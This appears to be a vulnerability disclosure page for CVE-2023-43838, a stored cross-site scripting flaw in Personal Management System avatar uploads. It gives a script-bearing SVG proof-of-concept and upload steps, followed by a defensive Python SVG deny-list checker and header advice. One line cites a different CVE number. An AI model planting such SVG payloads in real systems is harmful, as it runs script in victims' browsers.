CVE-2023-43838 PoC — Personal Management System Code Issue Vulnerability

Source
Associated Vulnerability
Title: Personal Management System Code Issue Vulnerability (CVE-2023-43838)
Description: An arbitrary file upload vulnerability in Personal Management System v1.4.64 allows attackers to execute arbitrary code via uploading a crafted SVG file into a user profile's avatar.
Description
Public disclosure for CVE-2023-31584.
Readme
# CVE-2023-43838

An arbitrary file upload vulnerability in Personal Management System
 v1.4.64 allows attackers to execute arbitrary code via uploading a
 crafted SVG file into a user profile's avatar.

 ------------------------------------------

 [Additional Information]
 1.) Create alert.svg with the following content:

```
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script type="text/javascript">
       alert("huntr.dev");
    </script>
 </svg>
```


2.) Host .SVG on webserver.

3.) Upload .SVG as avatar image.
4.) When a user opens the avatar in a separate tab, JavaScript stored in the .SVG file is executed.
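
For the upload side of the steps above, an added example (not part of the original README or of the Personal Management System code base) of a server-side check that refuses SVG avatars carrying active content. The function name `svg_findings`, the element and attribute lists, and both sample inputs are assumptions made for this illustration.

```python
import xml.etree.ElementTree as ET

# Elements that run script or embed arbitrary HTML inside an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "src"}

def local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return name.rsplit("}", 1)[-1]

def svg_findings(data: bytes) -> list:
    """Return reasons to reject an uploaded SVG; an empty list means none were found."""
    lowered = data.lower()
    # Avatars need no DTD; NUL bytes indicate UTF-16/32, which would hide one from this check.
    if b"<!doctype" in lowered or b"<!entity" in lowered or b"\x00" in data:
        return ["DTD declaration or NUL bytes"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = [] if local(root.tag) == "svg" else ["root element is not <svg>"]
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            attr = local(name).lower()
            if attr.startswith("on"):
                findings.append(f"event handler '{attr}' on <{tag}>")
            # Browsers ignore whitespace inside a URL scheme, so remove it first.
            url = "".join(value.split()).lower()
            if attr in URL_ATTRS and url.startswith(("javascript:", "data:text/html")):
                findings.append(f"script URL in '{attr}' on <{tag}>")
    return findings

# Constructed sample 1: the alert.svg from step 1 of the README.
README_SVG = b"""<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("huntr.dev");
   </script>
</svg>"""
# Constructed sample 2: the same rectangle with no script element.
STATIC_SVG = b"""<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255)" />
</svg>"""

if __name__ == "__main__":
    print(svg_findings(README_SVG))
    print(svg_findings(STATIC_SVG))
```

This is a deny-list, so treat it as a first check only. Serving uploaded files with `Content-Disposition: attachment` or a `Content-Security-Policy: script-src 'none'` response header covers the case in step 4, where the avatar is opened directly in its own tab.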


References:
https://github.com/Volmarg/personal-management-system 